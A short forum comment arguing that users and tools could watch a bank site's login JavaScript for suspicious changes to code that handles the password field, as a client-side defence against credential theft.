[lucb1e]

> So customers are skilled enough to check the (webpacked together with other stuff and minified) JS code running in their browser before they run it?

Rather than posing the obvious as a question, yes, I am aware that the overwhelming majority of users will not be able to inspect it themselves. But there are also loads of people who are, and we also roam the internet.

And it's not about inspecting before it runs, it's about noticing weird changes before you typed your credentials. Currently it's a strange idea to open an element inspector before regular actions such as logging in, and indeed, it'd be quite the hassle. But if this were commonplace I imagine tools would jump up to aid in this for both experts and laymen. It isn't terribly hard to trace which pieces of code do something with the password field (such as reading out its value, and trace where the variable is used and copied to) and alert on changes to those. Upon such an alert, customers of a bank might wait a few days to see if there was a breach, and security experts of said bank might like to see the diff that the browser detected. Just a thought of what could be if security was applied client-side more often.